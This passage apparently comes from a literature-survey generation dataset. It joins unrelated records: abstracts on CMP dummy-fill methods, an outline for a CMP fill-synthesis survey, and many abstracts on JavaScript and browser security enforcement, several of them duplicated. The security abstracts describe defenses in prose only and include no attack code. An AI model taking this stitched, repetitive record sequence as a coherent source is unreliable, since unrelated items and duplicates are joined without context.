Greedy method. For the MSFC PIL-Fill problem, we describe an iterated greedy method that integrates call to an industry static timing analysis tool. We test our methods on layout testcases obtained from industry. Compared with the normal fill method according to Y. Chen et al.(2002), our ILP-II method for MDFC PIL-Fill problem achieves between 25% and 90% reduction in terms of total weighted edge delay (roughly, a measure of sum of node slacks) impact while maintaining ideal quality of the layout density control and our iterated greedy method for MSFC PIL-II problem also shows significant advantage with respect to the minimum slack of nets on post-fill layout. --- paper_title: Intelligent Fill Pattern and Extraction Methodology for SoC paper_content: Uniform pattern density of physical layers of the die, such as diffusion, poly, or metals, has significant impact on electrical parameters of the product. At active level, variations in pattern density across the die translate into wide distributions of punch-through or breakdown voltages. At poly and metal levels, a non-uniform pattern density would result in poor planarity and give rise to high via resistances and poor control of the inter-layer capacitive coupling. However, at design stage, the complex functions of SoC functional blocks do not give designers enough freedom to strictly observe a predefined set of pattern density rules. Instead, the die pattern has to be made more uniform at die integration level, by global addition of fill features (waffles). While conceptually simple, this presents significant technical challenge, as the criteria for this addition are often difficult to meet. The simple but time consuming way of making pattern density uniform is based on manual drawing of dummy features over the electrical database (intellectual property, IP) of the die. A simplistic, automated approach is to add fill pattern of fixed density until it becomes close to target pattern density of the die. However, it may not be possible to equalize out all the regions even with changes in the die architecture. In addition, this approach tends to add dummy features even if unnecessary, driving towards very high pattern density. This solution is disadvantageous for RF/analog products the performance of which can be compromised by the capacitive coupling through the waffles. The methodology proposed that the initial die pattern density is first evaluated followed by the adjustable, intelligent fill of dynamic density at the block level. This way, it is possible to keep the original pattern density and work only on the areas of small density. The authors propose that the standard cell methodology should enable pre-die level modifications of pattern density and its extraction, to ensure that all the required blocks could be placed on the product and that their parasitics are properly extracted ---
Title: CMP Fill Synthesis: A Survey of Recent Studies Section 1: INTRODUCTION Description 1: Introduce the concept of Chemical-Mechanical Polishing (CMP), its significance in planarization, and the challenges it addresses in modern lithography processes. Section 2: CMP FILL TAXONOMY, BENEFITS, AND TRADEOFFS Description 2: Discuss the taxonomy of CMP fills, their benefits, tradeoffs, and different approaches like grounded versus floating fills and their impacts on resistance and capacitance (RC) parasitics. Section 3: LAYOUT DENSITY-ANALYSIS METHODS Description 3: Review methods for analyzing layout density, both fixed and continuous dissections, and their implications for density uniformity in CMP processes. Section 4: CHARACTERIZATION AND MODELING APPROACHES FOR BACK-END-OF-LINE (BEOL) CMP PROCESSES AND CORRESPONDING FILL SYNTHESIS APPROACHES Description 4: Explore various methods for characterizing and modeling BEOL CMP processes as well as different fill-synthesis methodologies, along with their problem formulations and solutions. Section 5: CHARACTERIZATION AND MODELING TECHNIQUES FOR FRONT-END-OF-LINE (FEOL) CMP PROCESSES AND SHALLOW-TRENCH-ISOLATION (STI) FILL-INSERTION PROBLEM Description 5: Explain techniques used for FEOL CMP characterization and modeling, specifically focusing on the STI fill-insertion problems and their impact on manufacturing processes. Section 6: DESIGN-DRIVEN FILL SYNTHESIS Description 6: Introduce the concept of design-driven fill synthesis, highlighting how it attempts to optimize CMP fill insertion by considering design performance and density constraints. Section 7: SUMMARY AND FUTURE CMP-FILL-SYNTHESIS FLOWS Description 7: Provide a summary of the survey and discuss potential future directions for CMP fill synthesis methods, including integration with CMP simulation, RC extraction, and multilayer fill synthesis.
Survey on JavaScript Security Policies and their Enforcement Mechanisms in a Web Browser
8
--- paper_title: Security of Web Mashups: a Survey paper_content: Web mashups, a new web application development paradigm, combine content and services from multiple origins into a new service. Web mashups heavily depend on interaction between content from multiple origins and communication with different origins. Contradictory, mashup security relies on separation for protecting code and data. Traditional HTML techniques fail to address both the interaction/communication needs and the separation needs. This paper proposes concrete requirements for building secure mashups, divided in four categories: separation, interaction, communication and advanced behavior control. For the first three categories, all currently available techniques are discussed in light of the proposed requirements. For the last category, we present three relevant academic research results with high potential. We conclude the paper by highlighting the most applicable techniques for building secure mashups, because of functionality and standardization. We also discuss opportunities for future improvements and developments. --- paper_title: Better security and privacy for web browsers: a survey of techniques, and a new implementation paper_content: The web browser is one of the most security critical software components today. It is used to interact with a variety of important applications and services, including social networking services, e-mail services, and e-commerce and e-health applications. But the same browser is also used to visit less trustworthy sites, and it is unreasonable to make it the end-user's responsibility to "browse safely". So it is an important design goal for a browser to provide adequate privacy and security guarantees, and to make sure that potentially malicious content from one web site can not compromise the browser, violate the user's privacy, or interfere with other web sites that the user interacts with. ::: ::: Hence, browser security has been a very active topic of research over the past decade, and many proposals have been made for new browser security techniques or architectures. In the first part of this paper, we provide a survey of some important problems and some proposed solutions. We start with a very broad view on browser security problems, and then zoom in on the issues related to the security of JavaScript scripts on the Web. We discuss three important classes of techniques: fine-grained script access control, capability-secure scripting and information flow security for scripts, focusing on techniques with a solid formal foundation. ::: ::: In the second part of the paper, we describe a novel implementation of one information flow security technique. We discuss how we have implemented the technique of secure multi-execution in the Mozilla Firefox browser, and we report on some preliminary experiments with this implementation. --- paper_title: You should Better Enforce than Verify ⋆ paper_content: This tutorial deals with runtime enforcement and advocates its use as an extension of runtime verification. While research efforts in runtime verification have been mainly concerned with detection of misbehaviors and acknowledgement of desired behaviors, runtime enforcement aims mainly to circumvent misbehaviors of systems and to guarantee desired behaviors. First, we propose a comparison between runtime verification and runtime enforcement. We then present previous theoretical models of runtime enforcement mechanisms and their expressive power with respect to enforcement. Then, we overview existing work on runtime enforcement monitor synthesis. Finally, we propose some future challenges for the runtime enforcement technique. --- paper_title: You are what you include: large-scale evaluation of remote javascript inclusions paper_content: JavaScript is used by web developers to enhance the interactivity of their sites, offload work to the users' browsers and improve their sites' responsiveness and user-friendliness, making web pages feel and behave like traditional desktop applications. An important feature of JavaScript, is the ability to combine multiple libraries from local and remote sources into the same page, under the same namespace. While this enables the creation of more advanced web applications, it also allows for a malicious JavaScript provider to steal data from other scripts and from the page itself. Today, when developers include remote JavaScript libraries, they trust that the remote providers will not abuse the power bestowed upon them. In this paper, we report on a large-scale crawl of more than three million pages of the top 10,000 Alexa sites, and identify the trust relationships of these sites with their library providers. We show the evolution of JavaScript inclusions over time and develop a set of metrics in order to assess the maintenance-quality of each JavaScript provider, showing that in some cases, top Internet sites trust remote providers that could be successfully compromised by determined attackers and subsequently serve malicious JavaScript. In this process, we identify four, previously unknown, types of vulnerabilities that attackers could use to attack popular web sites. Lastly, we review some proposed ways of protecting a web application from malicious remote scripts and show that some of them may not be as effective as previously thought. --- paper_title: Reactive non-interference for a browser model paper_content: We investigate non-interference (secure information flow) policies for web browsers, replacing or complementing the Same Origin Policy. First, we adapt a recently proposed dynamic information flow enforcement mechanism to support asynchronous I/O. We prove detailed security and precision results for this enforcement mechanism, and implement it for the Featherweight Firefox browser model. Second, we investigate three useful web browser security policies that can be enforced by our mechanism, and demonstrate their value and limitations. --- paper_title: Better security and privacy for web browsers: a survey of techniques, and a new implementation paper_content: The web browser is one of the most security critical software components today. It is used to interact with a variety of important applications and services, including social networking services, e-mail services, and e-commerce and e-health applications. But the same browser is also used to visit less trustworthy sites, and it is unreasonable to make it the end-user's responsibility to "browse safely". So it is an important design goal for a browser to provide adequate privacy and security guarantees, and to make sure that potentially malicious content from one web site can not compromise the browser, violate the user's privacy, or interfere with other web sites that the user interacts with. ::: ::: Hence, browser security has been a very active topic of research over the past decade, and many proposals have been made for new browser security techniques or architectures. In the first part of this paper, we provide a survey of some important problems and some proposed solutions. We start with a very broad view on browser security problems, and then zoom in on the issues related to the security of JavaScript scripts on the Web. We discuss three important classes of techniques: fine-grained script access control, capability-secure scripting and information flow security for scripts, focusing on techniques with a solid formal foundation. ::: ::: In the second part of the paper, we describe a novel implementation of one information flow security technique. We discuss how we have implemented the technique of secure multi-execution in the Mozilla Firefox browser, and we report on some preliminary experiments with this implementation. --- paper_title: WebJail: least-privilege integration of third-party components in web mashups paper_content: In the last decade, the Internet landscape has transformed from a mostly static world into Web 2.0, where the use of web applications and mashups has become a daily routine for many Internet users. Web mashups are web applications that combine data and functionality from several sources or components. Ideally, these components contain benign code from trusted sources. Unfortunately, the reality is very different. Web mashup components can misbehave and perform unwanted actions on behalf of the web mashup's user. Current mashup integration techniques either impose no restrictions on the execution of a third-party component, or simply rely on the Same-Origin Policy. A least-privilege approach, in which a mashup integrator can restrict the functionality available to each component, can not be implemented using the current integration techniques, without ownership over the component's code. We propose WebJail, a novel client-side security architecture to enable least-privilege integration of components into a web mashup, based on high-level policies that restrict the available functionality in each individual component. The policy language was synthesized from a study and categorization of sensitive operations in the upcoming HTML 5 JavaScript APIs, and full mediation is achieved via the use of deep aspects in the browser. We have implemented a prototype of WebJail in Mozilla Firefox 4.0, and applied it successfully to mainstream platforms such as iGoogle and Facebook. In addition, microbenchmarks registered a negligible performance penalty for page load-time (7ms), and the execution overhead in case of sensitive operations (0.1ms). --- paper_title: On JavaScript Malware and related threats paper_content: The term JavaScript Malware describes attacks that abuse the web browser’s capabilities to execute malicious script-code within the victim’s local execution context. Unlike related attacks, JavaScript Malware does not rely on security vulnerabilities in the web browser’s code but instead solely utilizes legal means in respect to the applying specification documents. Such attacks can either invade the user’s privacy, explore and exploit the LAN, or use the victimized browser as an attack proxy. This paper documents the state of the art concerning this class of attacks, sums up relevant protection approaches, and provides directions for future research. --- paper_title: An empirical study of privacy-violating information flows in JavaScript web applications paper_content: The dynamic nature of JavaScript web applications has given rise to the possibility of privacy violating information flows. We present an empirical study of the prevalence of such flows on a large number of popular websites. We have (1) designed an expressive, fine-grained information flow policy language that allows us to specify and detect different kinds of privacy-violating flows in JavaScript code,(2) implemented a new rewriting-based JavaScript information flow engine within the Chrome browser, and (3) used the enhanced browser to conduct a large-scale empirical study over the Alexa global top 50,000 websites of four privacy-violating flows: cookie stealing, location hijacking, history sniffing, and behavior tracking. Our survey shows that several popular sites, including Alexa global top-100 sites, use privacy-violating flows to exfiltrate information about users' browsing behavior. Our findings show that steps must be taken to mitigate the privacy threat from covert flows in browsers. --- paper_title: On the Incoherencies in Web Browser Access Control Policies paper_content: Web browsers' access control policies have evolved piecemeal in an ad-hoc fashion with the introduction of new browser features. This has resulted in numerous incoherencies. In this paper, we analyze three major access control flaws in today's browsers: (1) principal labeling is different for different resources, raising problems when resources interplay, (2) runtime changes to principal identities are handled inconsistently, and (3)browsers mismanage resources belonging to the user principal. We show that such mishandling of principals leads to many access control incoherencies, presenting hurdles for web developers to construct secure web applications. A unique contribution of this paper is to identify the compatibility cost of removing these unsafe browser features. To do this, we have built WebAnalyzer, a crawler-based framework for measuring real-world usage of browser features, and used it to study the top 100,000 popular web sites ranked by Alexa. Our methodology and results serve as a guideline for browser designers to balance security and backward compatibility. --- paper_title: On the Incoherencies in Web Browser Access Control Policies paper_content: Web browsers' access control policies have evolved piecemeal in an ad-hoc fashion with the introduction of new browser features. This has resulted in numerous incoherencies. In this paper, we analyze three major access control flaws in today's browsers: (1) principal labeling is different for different resources, raising problems when resources interplay, (2) runtime changes to principal identities are handled inconsistently, and (3)browsers mismanage resources belonging to the user principal. We show that such mishandling of principals leads to many access control incoherencies, presenting hurdles for web developers to construct secure web applications. A unique contribution of this paper is to identify the compatibility cost of removing these unsafe browser features. To do this, we have built WebAnalyzer, a crawler-based framework for measuring real-world usage of browser features, and used it to study the top 100,000 popular web sites ranked by Alexa. Our methodology and results serve as a guideline for browser designers to balance security and backward compatibility. --- paper_title: SessionShield: Lightweight Protection against Session Hijacking paper_content: The class of Cross-site Scripting (XSS) vulnerabilities is the most prevalent security problem in the field of Web applications. One of the main attack vectors used in connection with XSS is session hijacking via session identifier theft. While session hijacking is a client-side attack, the actual vulnerability resides on the server-side and, thus, has to be handled by the website's operator. In consequence, if the operator fails to address XSS, the application's users are defenseless against session hijacking attacks. ::: ::: In this paper we present SessionShield, a lightweight client-side protection mechanism against session hijacking that allows users to protect themselves even if a vulnerable website's operator neglects to mitigate existing XSS problems. SessionShield is based on the observation that session identifier values are not used by legitimate clientside scripts and, thus, need not to be available to the scripting languages running in the browser. Our system requires no training period and imposes negligible overhead to the browser, therefore, making it ideal for desktop and mobile systems. --- paper_title: Efficient purely-dynamic information flow analysis paper_content: We present a novel approach for efficiently tracking information flow in a dynamically-typed language such as JavaScript. Our approach is purely dynamic, and it detects problems with implicit paths via a dynamic check that avoids the need for an approximate static analyses while still guaranteeing non-interference. We incorporate this check into an efficient evaluation strategy based on sparse information labeling that leaves information flow labels implicit whenever possible, and introduces explicit labels only for values that migrate between security domains. We present experimental results showing that, on a range of small benchmark programs, sparse labeling provides a substantial (30%-50%) speed-up over universal labeling. --- paper_title: The Tangled Web: A Guide to Securing Modern Web Applications paper_content: "Thorough and comprehensive coverage from one of the foremost experts in browser security." --Tavis Ormandy, Google Inc.Modern web applications are built on a tangle of technologies that have been developed over time and then haphazardly pieced together. Every piece of the web application stack, from HTTP requests to browser-side scripts, comes with important yet subtle security consequences. To keep users safe, it is essential for developers to confidently navigate this landscape.In The Tangled Web, Michal Zalewski, one of the world's top browser security experts, offers a compelling narrative that explains exactly how browsers work and why they're fundamentally insecure. Rather than dispense simplistic advice on vulnerabilities, Zalewski examines the entire browser security model, revealing weak points and providing crucial information for shoring up web application security. You'll learn how to: Perform common but surprisingly complex tasks such as URL parsing and HTML sanitization Use modern security features like Strict Transport Security, Content Security Policy, and Cross-Origin Resource Sharing Leverage many variants of the same-origin policy to safely compartmentalize complex web applications and protect user credentials in case of XSS bugs Build mashups and embed gadgets without getting stung by the tricky frame navigation policy Embed or host user-supplied content without running into the trap of content sniffing For quick reference, "Security Engineering Cheat Sheets" at the end of each chapter offer ready solutions to problems you're most likely to encounter. With coverage extending as far as planned HTML5 features, The Tangled Web will help you create secure web applications that stand the test of time. --- paper_title: Third-Party Web Tracking: Policy and Technology paper_content: In the early days of the web, content was designed and hosted by a single person, group, or organization. No longer. Webpages are increasingly composed of content from myriad unrelated "third-party" websites in the business of advertising, analytics, social networking, and more. Third-party services have tremendous value: they support free content and facilitate web innovation. But third-party services come at a privacy cost: researchers, civil society organizations, and policymakers have increasingly called attention to how third parties can track a user's browsing activities across websites. This paper surveys the current policy debate surrounding third-party web tracking and explains the relevant technology. It also presents the FourthParty web measurement platform and studies we have conducted with it. Our aim is to inform researchers with essential background and tools for contributing to public understanding and policy debates about web tracking. --- paper_title: Detecting and Defending Against Third-Party Tracking on the Web paper_content: While third-party tracking on the web has garnered much attention, its workings remain poorly understood. Our goal is to dissect how mainstream web tracking occurs in the wild. We develop a client-side method for detecting and classifying five kinds of third-party trackers based on how they manipulate browser state. We run our detection system while browsing the web and observe a rich ecosystem, with over 500 unique trackers in our measurements alone. We find that most commercial pages are tracked by multiple parties, trackers vary widely in their coverage with a small number being widely deployed, and many trackers exhibit a combination of tracking behaviors. Based on web search traces taken from AOL data, we estimate that several trackers can each capture more than 20% of a user's browsing behavior. We further assess the impact of defenses on tracking and find that no existing browser mechanisms prevent tracking by social media sites via widgets while still allowing those widgets to achieve their utility goals, which leads us to develop a new defense. To the best of our knowledge, our work is the most complete study of web tracking to date. --- paper_title: Fortifying web-based applications automatically paper_content: Browser designers create security mechanisms to help web developers protect web applications, but web developers are usually slow to use these features in web-based applications (web apps). In this paper we introduce Zan, a browser-based system for applying new browser security mechanisms to legacy web apps automatically. Our key insight is that web apps often contain enough information, via web developer source-code patterns or key properties of web-app objects, to allow the browser to infer opportunities for applying new security mechanisms to existing web apps. We apply this new concept to protect authentication cookies, prevent web apps from being framed unwittingly, and perform JavaScript object deserialization safely. We evaluate Zan on up to the 1000 most popular websites for each of the three cases. We find that Zan can provide complimentary protection for the majority of potentially applicable websites automatically without requiring additional code from the web developers and with negligible incompatibility impact. --- paper_title: An empirical study of privacy-violating information flows in JavaScript web applications paper_content: The dynamic nature of JavaScript web applications has given rise to the possibility of privacy violating information flows. We present an empirical study of the prevalence of such flows on a large number of popular websites. We have (1) designed an expressive, fine-grained information flow policy language that allows us to specify and detect different kinds of privacy-violating flows in JavaScript code,(2) implemented a new rewriting-based JavaScript information flow engine within the Chrome browser, and (3) used the enhanced browser to conduct a large-scale empirical study over the Alexa global top 50,000 websites of four privacy-violating flows: cookie stealing, location hijacking, history sniffing, and behavior tracking. Our survey shows that several popular sites, including Alexa global top-100 sites, use privacy-violating flows to exfiltrate information about users' browsing behavior. Our findings show that steps must be taken to mitigate the privacy threat from covert flows in browsers. --- paper_title: On the Incoherencies in Web Browser Access Control Policies paper_content: Web browsers' access control policies have evolved piecemeal in an ad-hoc fashion with the introduction of new browser features. This has resulted in numerous incoherencies. In this paper, we analyze three major access control flaws in today's browsers: (1) principal labeling is different for different resources, raising problems when resources interplay, (2) runtime changes to principal identities are handled inconsistently, and (3)browsers mismanage resources belonging to the user principal. We show that such mishandling of principals leads to many access control incoherencies, presenting hurdles for web developers to construct secure web applications. A unique contribution of this paper is to identify the compatibility cost of removing these unsafe browser features. To do this, we have built WebAnalyzer, a crawler-based framework for measuring real-world usage of browser features, and used it to study the top 100,000 popular web sites ranked by Alexa. Our methodology and results serve as a guideline for browser designers to balance security and backward compatibility. --- paper_title: On the Incoherencies in Web Browser Access Control Policies paper_content: Web browsers' access control policies have evolved piecemeal in an ad-hoc fashion with the introduction of new browser features. This has resulted in numerous incoherencies. In this paper, we analyze three major access control flaws in today's browsers: (1) principal labeling is different for different resources, raising problems when resources interplay, (2) runtime changes to principal identities are handled inconsistently, and (3)browsers mismanage resources belonging to the user principal. We show that such mishandling of principals leads to many access control incoherencies, presenting hurdles for web developers to construct secure web applications. A unique contribution of this paper is to identify the compatibility cost of removing these unsafe browser features. To do this, we have built WebAnalyzer, a crawler-based framework for measuring real-world usage of browser features, and used it to study the top 100,000 popular web sites ranked by Alexa. Our methodology and results serve as a guideline for browser designers to balance security and backward compatibility. --- paper_title: WebJail: least-privilege integration of third-party components in web mashups paper_content: In the last decade, the Internet landscape has transformed from a mostly static world into Web 2.0, where the use of web applications and mashups has become a daily routine for many Internet users. Web mashups are web applications that combine data and functionality from several sources or components. Ideally, these components contain benign code from trusted sources. Unfortunately, the reality is very different. Web mashup components can misbehave and perform unwanted actions on behalf of the web mashup's user. Current mashup integration techniques either impose no restrictions on the execution of a third-party component, or simply rely on the Same-Origin Policy. A least-privilege approach, in which a mashup integrator can restrict the functionality available to each component, can not be implemented using the current integration techniques, without ownership over the component's code. We propose WebJail, a novel client-side security architecture to enable least-privilege integration of components into a web mashup, based on high-level policies that restrict the available functionality in each individual component. The policy language was synthesized from a study and categorization of sensitive operations in the upcoming HTML 5 JavaScript APIs, and full mediation is achieved via the use of deep aspects in the browser. We have implemented a prototype of WebJail in Mozilla Firefox 4.0, and applied it successfully to mainstream platforms such as iGoogle and Facebook. In addition, microbenchmarks registered a negligible performance penalty for page load-time (7ms), and the execution overhead in case of sensitive operations (0.1ms). --- paper_title: Edit automata: enforcement mechanisms for run-time security policies paper_content: We analyze the space of security policies that can be enforced by monitoring and modifying programs at run time. Our program monitors, called edit automata, are abstract machines that examine the sequence of application program actions and transform the sequence when it deviates from a specified policy. Edit automata have a rich set of transformational powers: they may terminate an application, thereby truncating the program action stream; they may suppress undesired or dangerous actions without necessarily terminating the program; and they may also insert additional actions into the event stream. ::: ::: After providing a formal definition of edit automata, we develop a rigorous framework for reasoning about them and their cousins: truncation automata (which can only terminate applications), suppression automata (which can terminate applications and suppress individual actions), and insertion automata (which can terminate and insert). We give a set-theoretic characterization of the policies each sort of automaton can enforce, and we provide examples of policies that can be enforced by one sort of automaton but not another. --- paper_title: Enforceable security policies paper_content: A precise characterization is given for the class of security policies that can be enforced using mechanisms that work by monitoring system execution, and a class of automata is introduced for specifying those security policies. Techniques to enforce security policies specified by such automata are also discussed. READERS NOTE: A substantially revised version of this document is available at http://cs-tr.cs.cornell.edu:80/Dienst/UI/1.0/Display/ncstrl.cornell/TR99-1759 --- paper_title: Run-Time Enforcement of Nonsafety Policies paper_content: A common mechanism for ensuring that software behaves securely is to monitor programs at run time and check that they dynamically adhere to constraints specified by a security policy. Whenever a program monitor detects that untrusted software is attempting to execute a dangerous action, it takes remedial steps to ensure that only safe code actually gets executed. This article improves our understanding of the space of policies enforceable by monitoring the run-time behaviors of programs. We begin by building a formal framework for analyzing policy enforcement: we precisely define policies, monitors, and enforcement. This framework allows us to prove that monitors enforce an interesting set of policies that we call the infinite renewal properties. We show how to construct a program monitor that provably enforces any reasonable infinite renewal property. We also show that the set of infinite renewal properties includes some nonsafety policies, that is, that monitors can enforce some nonsafety (including some purely liveness) policies. Finally, we demonstrate concrete examples of nonsafety policies enforceable by practical run-time monitors. --- paper_title: A Sound Type System For Secure Flow Analysis paper_content: Ensuring secure information flow within programs in the context of multiple sensitivity levels has been widely studied. Especially noteworthy is Denning’s work in secure flow analysis and the lattice model [6][7]. Until now, however, the soundness of Denning’s analysis has not been established satisfactorily. We formulate Denning’s approach as a type system and present a notion of soundness for the system that can be viewed as a form of noninterference. Soundness is established by proving, with respect to a standard programming language semantics, that all well-typed programs have this noninterference property. --- paper_title: Detecting malicious JavaScript code in Mozilla paper_content: The JavaScript language is used to enhance the client-side display of web pages. JavaScript code is downloaded into browsers and executed on-the-fly by an embedded interpreter. Browsers provide sand-boxing mechanisms to prevent JavaScript code from compromising the security of the client's environment, but, unfortunately, a number of attacks exist that can be used to steal users' credentials (e.g., cross-site scripting attacks) and lure users into providing sensitive information to unauthorized parties (e.g., phishing attacks). We propose an approach to solve this problem that is based on monitoring JavaScript code execution and comparing the execution to high-level policies, to detect malicious code behavior. To achieve this goal it is necessary to provide a mechanism to audit the execution of JavaScript code. This is a difficult task, because of the close integration of JavaScript with complex browser applications, such as Mozilla. This paper presents the first existing implementation of an auditing system for JavaScript interpreters and discusses the pitfalls and lessons learned in developing the auditing mechanism. --- paper_title: Edit automata: enforcement mechanisms for run-time security policies paper_content: We analyze the space of security policies that can be enforced by monitoring and modifying programs at run time. Our program monitors, called edit automata, are abstract machines that examine the sequence of application program actions and transform the sequence when it deviates from a specified policy. Edit automata have a rich set of transformational powers: they may terminate an application, thereby truncating the program action stream; they may suppress undesired or dangerous actions without necessarily terminating the program; and they may also insert additional actions into the event stream. ::: ::: After providing a formal definition of edit automata, we develop a rigorous framework for reasoning about them and their cousins: truncation automata (which can only terminate applications), suppression automata (which can terminate applications and suppress individual actions), and insertion automata (which can terminate and insert). We give a set-theoretic characterization of the policies each sort of automaton can enforce, and we provide examples of policies that can be enforced by one sort of automaton but not another. --- paper_title: JavaScript instrumentation for browser security paper_content: It is well recognized that JavaScript can be exploited to launch browser-based security attacks. We propose to battle such attacks using program instrumentation. Untrusted JavaScript code goes through a rewriting process which identifies relevant operations, modifies questionable behaviors, and prompts the user (a web page viewer) for decisions on how to proceed when appropriate. Our solution is parametric with respect to the security policy-the policy is implemented separately from the rewriting, and the same rewriting process is carried out regardless of which policy is in use. Be-sides providing a rigorous account of the correctness of our solution, we also discuss practical issues including policy management and prototype experiments. A useful by-product of our work is an operational semantics of a core subset of JavaScript, where code embedded in (HTML) documents may generate further document pieces (with new code embedded) at runtime, yielding a form of self-modifying code. --- paper_title: Lightweight self-protecting JavaScript paper_content: This paper introduces a method to control JavaScript execution. The aim is to prevent or modify inappropriate behaviour caused by e.g. malicious injected scripts or poorly designed third-party code. The approach is based on modifying the code so as to make it self-protecting: the protection mechanism (security policy) is embedded into the code itself and intercepts security relevant API calls. The challenges come from the nature of the JavaScript language: any variables in the scope of the program can be redefined, and code can be created and run on-the-fly. This creates potential problems, respectively, for tamper-proofing the protection mechanism, and for ensuring that no security relevant events bypass the protection. Unlike previous approaches to instrument and monitor JavaScript to enforce or adjust behaviour, the solution we propose is lightweight in that (i) it does not require a modified browser, and (ii) it does not require any run-time parsing and transformation of code (including dynamically generated code). As a result, the method has low run-time overhead compared to other methods satisfying (i), and the lack of need for browser modifications means that the policy can even be applied on the server to mitigate some effects of cross-site scripting bugs. --- paper_title: Detecting malicious JavaScript code in Mozilla paper_content: The JavaScript language is used to enhance the client-side display of web pages. JavaScript code is downloaded into browsers and executed on-the-fly by an embedded interpreter. Browsers provide sand-boxing mechanisms to prevent JavaScript code from compromising the security of the client's environment, but, unfortunately, a number of attacks exist that can be used to steal users' credentials (e.g., cross-site scripting attacks) and lure users into providing sensitive information to unauthorized parties (e.g., phishing attacks). We propose an approach to solve this problem that is based on monitoring JavaScript code execution and comparing the execution to high-level policies, to detect malicious code behavior. To achieve this goal it is necessary to provide a mechanism to audit the execution of JavaScript code. This is a difficult task, because of the close integration of JavaScript with complex browser applications, such as Mozilla. This paper presents the first existing implementation of an auditing system for JavaScript interpreters and discusses the pitfalls and lessons learned in developing the auditing mechanism. --- paper_title: Lightweight self-protecting JavaScript paper_content: This paper introduces a method to control JavaScript execution. The aim is to prevent or modify inappropriate behaviour caused by e.g. malicious injected scripts or poorly designed third-party code. The approach is based on modifying the code so as to make it self-protecting: the protection mechanism (security policy) is embedded into the code itself and intercepts security relevant API calls. The challenges come from the nature of the JavaScript language: any variables in the scope of the program can be redefined, and code can be created and run on-the-fly. This creates potential problems, respectively, for tamper-proofing the protection mechanism, and for ensuring that no security relevant events bypass the protection. Unlike previous approaches to instrument and monitor JavaScript to enforce or adjust behaviour, the solution we propose is lightweight in that (i) it does not require a modified browser, and (ii) it does not require any run-time parsing and transformation of code (including dynamically generated code). As a result, the method has low run-time overhead compared to other methods satisfying (i), and the lack of need for browser modifications means that the policy can even be applied on the server to mitigate some effects of cross-site scripting bugs. --- paper_title: I.: Javascript instrumentation in practice paper_content: JavaScript has been exploited to launch various browser-based attacks. Our previous work proposed a theoretical framework applying policy-based code instrumentation to JavaScript. This paper further reports our experience carrying out the theory in practice. Specifically, we discuss how the instrumentation is performed on various JavaScript and HTML syntactic constructs, present a new policy construction method for facilitating the creation and compilation of security policies, and document various practical difficulties arose during our prototyping. Our prototype currently works with several different web browsers, including Safari Mobile running on iPhones. We report our results based on experiments using representative real-world web applications --- paper_title: WebJail: least-privilege integration of third-party components in web mashups paper_content: In the last decade, the Internet landscape has transformed from a mostly static world into Web 2.0, where the use of web applications and mashups has become a daily routine for many Internet users. Web mashups are web applications that combine data and functionality from several sources or components. Ideally, these components contain benign code from trusted sources. Unfortunately, the reality is very different. Web mashup components can misbehave and perform unwanted actions on behalf of the web mashup's user. Current mashup integration techniques either impose no restrictions on the execution of a third-party component, or simply rely on the Same-Origin Policy. A least-privilege approach, in which a mashup integrator can restrict the functionality available to each component, can not be implemented using the current integration techniques, without ownership over the component's code. We propose WebJail, a novel client-side security architecture to enable least-privilege integration of components into a web mashup, based on high-level policies that restrict the available functionality in each individual component. The policy language was synthesized from a study and categorization of sensitive operations in the upcoming HTML 5 JavaScript APIs, and full mediation is achieved via the use of deep aspects in the browser. We have implemented a prototype of WebJail in Mozilla Firefox 4.0, and applied it successfully to mainstream platforms such as iGoogle and Facebook. In addition, microbenchmarks registered a negligible performance penalty for page load-time (7ms), and the execution overhead in case of sensitive operations (0.1ms). --- paper_title: ConScript: Specifying and Enforcing Fine-Grained Security Policies for JavaScript in the Browser paper_content: Much of the power of modern Web comes from the ability of a Web page to combine content and JavaScript code from disparate servers on the same page. While the ability to create such mash-ups is attractive for both the user and the developer because of extra functionality, code inclusion effectively opens the hosting site up for attacks and poor programming practices within every JavaScript library or API it chooses to use. In other words, expressiveness comes at the price of losing control. To regain the control, it is therefore valuable to provide means for the hosting page to restrict the behavior of the code that the page may include. This paper presents ConScript, a client-side advice implementation for security, built on top of Internet Explorer 8. ConScript allows the hosting page to express fine-grained application-specific security policies that are enforced at runtime. In addition to presenting 17 widely-ranging security and reliability policies that ConScript enables, we also show how policies can be generated automatically through static analysis of server-side code or runtime analysis of client-side code. We also present a type system that helps ensure correctness of ConScript policies. To show the practicality of ConScript in a range of settings, we compare the overhead of ConScript enforcement and conclude that it is significantly lower than that of other systems proposed in the literature, both on micro-benchmarks as well as large, widely-used applications such as MSN, GMail, Google Maps, and Live Desktop. --- paper_title: Lightweight self-protecting JavaScript paper_content: This paper introduces a method to control JavaScript execution. The aim is to prevent or modify inappropriate behaviour caused by e.g. malicious injected scripts or poorly designed third-party code. The approach is based on modifying the code so as to make it self-protecting: the protection mechanism (security policy) is embedded into the code itself and intercepts security relevant API calls. The challenges come from the nature of the JavaScript language: any variables in the scope of the program can be redefined, and code can be created and run on-the-fly. This creates potential problems, respectively, for tamper-proofing the protection mechanism, and for ensuring that no security relevant events bypass the protection. Unlike previous approaches to instrument and monitor JavaScript to enforce or adjust behaviour, the solution we propose is lightweight in that (i) it does not require a modified browser, and (ii) it does not require any run-time parsing and transformation of code (including dynamically generated code). As a result, the method has low run-time overhead compared to other methods satisfying (i), and the lack of need for browser modifications means that the policy can even be applied on the server to mitigate some effects of cross-site scripting bugs. --- paper_title: WebJail: least-privilege integration of third-party components in web mashups paper_content: In the last decade, the Internet landscape has transformed from a mostly static world into Web 2.0, where the use of web applications and mashups has become a daily routine for many Internet users. Web mashups are web applications that combine data and functionality from several sources or components. Ideally, these components contain benign code from trusted sources. Unfortunately, the reality is very different. Web mashup components can misbehave and perform unwanted actions on behalf of the web mashup's user. Current mashup integration techniques either impose no restrictions on the execution of a third-party component, or simply rely on the Same-Origin Policy. A least-privilege approach, in which a mashup integrator can restrict the functionality available to each component, can not be implemented using the current integration techniques, without ownership over the component's code. We propose WebJail, a novel client-side security architecture to enable least-privilege integration of components into a web mashup, based on high-level policies that restrict the available functionality in each individual component. The policy language was synthesized from a study and categorization of sensitive operations in the upcoming HTML 5 JavaScript APIs, and full mediation is achieved via the use of deep aspects in the browser. We have implemented a prototype of WebJail in Mozilla Firefox 4.0, and applied it successfully to mainstream platforms such as iGoogle and Facebook. In addition, microbenchmarks registered a negligible performance penalty for page load-time (7ms), and the execution overhead in case of sensitive operations (0.1ms). --- paper_title: JavaScript instrumentation for browser security paper_content: It is well recognized that JavaScript can be exploited to launch browser-based security attacks. We propose to battle such attacks using program 